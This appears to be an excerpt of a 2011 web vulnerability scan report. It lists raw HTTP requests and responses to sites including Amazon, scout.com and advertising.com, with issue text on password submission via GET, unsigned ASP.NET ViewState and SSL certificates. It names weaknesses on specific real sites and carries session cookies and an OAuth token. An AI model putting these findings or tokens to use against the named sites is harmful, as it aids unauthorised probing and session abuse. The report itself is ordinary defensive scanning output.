BODY { font- ...[SNIP]... </a><a href="/gp/redirect.html/ref=cm_sw_cl_fa_idp_xmkrnb0BDP91Z?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0981511821%2Fref%3Dcm_sw_r_fa_idp_xmkrnb0BDP91Z%26bodytext%3DSilverlight%25204%2520Jumpstart%2520by%2520David%2520Yack" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_idp_xmkrnb0BDP91Z?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0981511821%2Fref%3Dcm_sw_r_fa_idp_xmkrnb0BDP91Z%26bodytext%3DSilverlight%25204%2520Jumpstart%2520by%2520David%2520Yack', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;"> ...[SNIP]... </a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_idp_xmkrnb0BDP91Z?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0981511821%252Fref%253Dcm_sw_r_tw_idp_xmkrnb0BDP91Z%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSilverlight%25204%2520Jumpstart%2520by%2520David%2520Yack%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0981511821%2Fref%3Dcm_sw_r_tw_idp_xmkrnb0BDP91Z%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_idp_xmkrnb0BDP91Z?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0981511821%252Fref%253Dcm_sw_r_tw_idp_xmkrnb0BDP91Z%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSilverlight%25204%2520Jumpstart%2520by%2520David%2520Yack%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0981511821%2Fref%3Dcm_sw_r_tw_idp_xmkrnb0BDP91Z%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;"> ...[SNIP]... <div class="content"> If you are a publisher or author and hold the digital rights to a book, you can sell a digital version of it in our Kindle Store. <a href="/gp/redirect.html/ref=dtp_dp_lm_0981511821/177-1907126-9874658?location=http://dtp.amazon.com/&token=ED7546842AF86000862C6B4CDB683D114A0EDF07">Learn more</a> ...[SNIP]... <li><a href="/gp/redirect.html/ref=gw_m_b_ir/177-1907126-9874658?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a> ...[SNIP]... <li><a href="/gp/redirect.html/ref=gw_m_b_pr/177-1907126-9874658?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a> ...[SNIP]... <li><a href="/gp/redirect.html/177-1907126-9874658?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a> ...[SNIP]... <li><a href="/gp/redirect.html/177-1907126-9874658?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a> ...[SNIP]...
GET /gp/product/184968006X?ie=UTF8&tag=silverlightnet-20&linkCode=xm2&camp=1789&creativeASIN=184968006X HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:30:20 GMT Server: Server x-amz-id-1: 0XKECKNR6H60A6C1P2PC p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: CcVgt8Ki3aGDcInLSZrXm3lZNlBFSwvoguF5oYlAkL7M50lOj+5ROXGiGrpYAFMx Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=180-2237308-2659866; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: UserPref=eHjsire/T0R7tdwagP8TcPZKxHTTNNEzlEP0ADU6p9fDKp0HUddz5FB1vK4SWFnhMc+scZ3m3MMvdOoMBY3JMfDMgo9VyMfPoh4njOXzH+BQw3FF7fbIOVZ2IDZk0zQNft3m03t/gL+Tvy3Fp+s+IAXdK6TUGa3MgVEkoCKmlXgie4ZhutN7WZcgnsC2goxBTpcCUomgvJOn1FOsZJdpvaOeWwE7d4VopLfVs94lsjI1refuYz4Fh3eO4sF0scjQpxW30YkQtgxE21eMEFTpM3qzTPbz2A4In7Bgd+9yov6kS3a2jmHTnaE+PhrTEqnDDXpdHgngmPdiaQgXuM6nGSPUPALmbdC5KPrDo93c5AVJkz34KeYRlhnIYDw9LgulDl/Iq7uP7A0bF2cLU4kNTRvZoGaE4G4BI5Ct3/CXQEOqN+ABdMJN/2U0eTeT5lbUCjHlpbF1b4Y=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:20 2011 GMT Content-Length: 400270
<html> <head>
<style type="text/css"><!--
BODY { font- ...[SNIP]... </a><a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_nmkrnb0KCN66A?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F184968006X%2Fref%3Dcm_sw_r_fa_dp_nmkrnb0KCN66A%26bodytext%3DMicrosoft%2520Silverlight%25204%2520and%2520SharePoint%25202010%2520Integration%2520by%2520Gaston%2520C.%2520Hillar" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_nmkrnb0KCN66A?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F184968006X%2Fref%3Dcm_sw_r_fa_dp_nmkrnb0KCN66A%26bodytext%3DMicrosoft%2520Silverlight%25204%2520and%2520SharePoint%25202010%2520Integration%2520by%2520Gaston%2520C.%2520Hillar', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;"> ...[SNIP]... </a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_nmkrnb0KCN66A?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F184968006X%252Fref%253Dcm_sw_r_tw_dp_nmkrnb0KCN66A%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DMicrosoft%2520Silverlight%25204%2520and%2520SharePoint%25202010%2520Integration%2520by%2520Gaston%2520C.%2520Hillar%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F184968006X%2Fref%3Dcm_sw_r_tw_dp_nmkrnb0KCN66A%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_nmkrnb0KCN66A?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F184968006X%252Fref%253Dcm_sw_r_tw_dp_nmkrnb0KCN66A%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DMicrosoft%2520Silverlight%25204%2520and%2520SharePoint%25202010%2520Integration%2520by%2520Gaston%2520C.%2520Hillar%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F184968006X%2Fref%3Dcm_sw_r_tw_dp_nmkrnb0KCN66A%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;"> ...[SNIP]... </span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R11J3G9XYVOT3B/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C528D74CE108B51ADF700EDE9B58756F117A6778&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R11J3G9XYVOT3B.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866"><span class="cmtySprite s_largeYes " > ...[SNIP]... </a> <a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R11J3G9XYVOT3B/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=39C1FB4A30BAA4BF73279374D7DC87858E61D96F&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R11J3G9XYVOT3B.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866"><span class="cmtySprite s_largeNo " > ...[SNIP]... <nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R11J3G9XYVOT3B/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=4DD433FE7637EE1BE3766B94B047C4A371A9C8B8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R11J3G9XYVOT3B.2115.Inappropriate.Reviews&voteSessionID=180-2237308-2659866" >Report abuse</a> ...[SNIP]... </span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RN32EONZRC41F/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=41F556ECB290E80B254EB00D3A227CA897ECD8B0&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=RN32EONZRC41F.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866"><span class="cmtySprite s_largeYes " > ...[SNIP]... </a> <a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RN32EONZRC41F/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=D8A2919B13050E502CCFB68A2497B7FBE4582C58&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=RN32EONZRC41F.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866"><span class="cmtySprite s_largeNo " > ...[SNIP]... <nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RN32EONZRC41F/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=455A7397FFB26B5989764534CDD846328D74CD06&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=RN32EONZRC41F.2115.Inappropriate.Reviews&voteSessionID=180-2237308-2659866" >Report abuse</a> ...[SNIP]... </span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1RHEGL50Q9KBE/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=76717228FE30975E8AF64100357ADF4AF0BC2AF1&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R1RHEGL50Q9KBE.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866"><span class="cmtySprite s_largeYes " > ...[SNIP]... </a> <a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1RHEGL50Q9KBE/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=34E5070F33D26B6EC34A2C2DCF086842CE9AC262&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R1RHEGL50Q9KBE.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866"><span class="cmtySprite s_largeNo " > ...[SNIP]... <nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1RHEGL50Q9KBE/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=0C8FAE0A58222B2EF35D388EC6197256843C46BE&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R1RHEGL50Q9KBE.2115.Inappropriate.Reviews&voteSessionID=180-2237308-2659866" >Report abuse</a> ...[SNIP]... <div class="content"> If you are a publisher or author and hold the digital rights to a book, you can sell a digital version of it in our Kindle Store. <a href="/gp/redirect.html/ref=dtp_dp_lm_184968006X/180-2237308-2659866?location=http://dtp.amazon.com/&token=ED7546842AF86000862C6B4CDB683D114A0EDF07">Learn more</a> ...[SNIP]... <li><a href="/gp/redirect.html/ref=gw_m_b_ir/180-2237308-2659866?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a> ...[SNIP]... <li><a href="/gp/redirect.html/ref=gw_m_b_pr/180-2237308-2659866?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a> ...[SNIP]... <li><a href="/gp/redirect.html/180-2237308-2659866?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a> ...[SNIP]... <li><a href="/gp/redirect.html/180-2237308-2659866?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a> ...[SNIP]...
GET /gp/product/1935182374?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=1935182374 HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:29:13 GMT Server: Server x-amz-id-1: 0HRJE1J9WQNXJFNGE4NT p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: NW5s8gvokJzw5y8JSRfujzyLlaoU46emA4SVA7QeDoqwIRKJVd6WwTevRv3TMvWf Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=187-0383633-5130955; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: UserPref=ZM4E0es5+/XEPKcb4MMxmuznZiNyR6gzmDyuvhd39TYBscZma+7OBrLUTIyOOP5L3sOxz0fHi+PVrR7mWXqIyqofYHjJvSwGljfj0cWis60uRBkc1sDMnpiFAFA2IIWQcy0VuQkFO/hek0tlyUsNbuYdCElWcPRfXi2EhNSRROn/5eBkOahc4qN0YXGEPSxJXkpZsFFUUSU+6NyU2vkiTcA6YKmyCajS7mMAIbCCQEcVDyHYe/GzA3wLflh2+74ShUEGuIQUYMUcM2sdqOFPBWrtSn3q/r5KXVvVo3NHlIV0vVwFkMcJVoUPOq2S74LF/6hYIm/NwCdL9vCXUOjzqk7tUlQ3znq9WVE1fo0DdyrZ3XKTD152l098UAWXhdfxPyegtMSG3+GMu2CSzmKtj4j6dgItiNp5cZZ5baIxudoffyAijgZcIzX2w8f4DVw+AMxSy/RUheA=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:13 2011 GMT Content-Length: 398788
GET /scp/AuthServiceTwitter.aspx?redirectTo=0&mkt=en-us&format=Homepage HTTP/1.1 Host: www.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 23:53:38 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: CO1MPPRENA29 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Location: https://twitter.com/oauth/authorize?oauth_token=9T0KnvKj2f5TMU7GEkBamV6wKekTBMsAa6sruPRY0zM&lang=en Cache-Control: no-cache Cache-Control: no-store, must-revalidate, max-age=0 Content-Type: text/html; charset=utf-8 Content-Length: 220
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://twitter.com/oauth/authorize?oauth_token=9T0KnvKj2f5TMU7GEkBamV6wKekTBMsAa6sruPRY0zM&lang=en">here</a>.</h ...[SNIP]...
GET / HTTP/1.1 Host: www.thespacereview.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:19:34 GMT Server: Apache/1.3.41 Ben-SSL/1.59 (Unix) PHP/4.0.6 Connection: close Content-Type: text/html Content-Length: 24875
<html> <head> <title>The Space Review: essays and commentary about the final frontier</title> <link rel="stylesheet" type="text/css" href="/includes/style.css"> </head>
SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.
It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
GET /blog/observations/ HTTP/1.1 Host: www.scientificamerican.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.
By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.
You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.
Issue remediation
There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.
GET / HTTP/1.1 Host: beta-ads.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Sun, 30 Jan 2011 02:06:03 GMT Content-Length: 1402 Connection: close Set-Cookie: A07L=CT; expires=Sun, 27-Feb-2011 02:06:03 GMT; path=/; domain=beta-ads.ace.advertising.com P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
GET / HTTP/1.1 Host: college.scout.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 02:07:54 GMT Server: Microsoft-IIS/6.0 Server: Static2 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.6.24.1.5335 Accept-Ranges: bytes Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/ Cache-Control: public, s-maxage=600 Expires: Sun, 30 Jan 2011 02:17:54 GMT Last-Modified: Sat, 29 Jan 2011 23:57:33 GMT ETag: "1CBC0104B911480" Content-Type: text/html Content-Length: 69563
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <title>College Team Directory Front Page</title> <meta http ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" /> ...[SNIP]...
GET / HTTP/1.1 Host: jcfootball.scout.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 02:09:07 GMT Server: Microsoft-IIS/6.0 Server: Market X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.6.24.1.5335 Accept-Ranges: bytes Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/ Cache-Control: public, s-maxage=600 Expires: Sun, 30 Jan 2011 02:19:07 GMT Last-Modified: Sat, 29 Jan 2011 23:52:25 GMT ETag: "1CBC00F93FC0280" Content-Type: text/html Content-Length: 41053
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <title>JC Football Recruiting Front Page</title> <meta http ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" /> ...[SNIP]...
GET / HTTP/1.1 Host: p.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 02:17:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 1388
GET / HTTP/1.1 Host: r1.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 02:18:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 1390
GET /a.z HTTP/1.1 Host: recruiting.scout.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Sat, 29 Jan 2011 23:50:44 GMT Server: Microsoft-IIS/6.0 Server: Static2 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.6.24.1.5335 Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/ Cache-Control: public, s-maxage=600 Expires: Sun, 30 Jan 2011 00:00:44 GMT Content-Type: text/html Content-Length: 11945
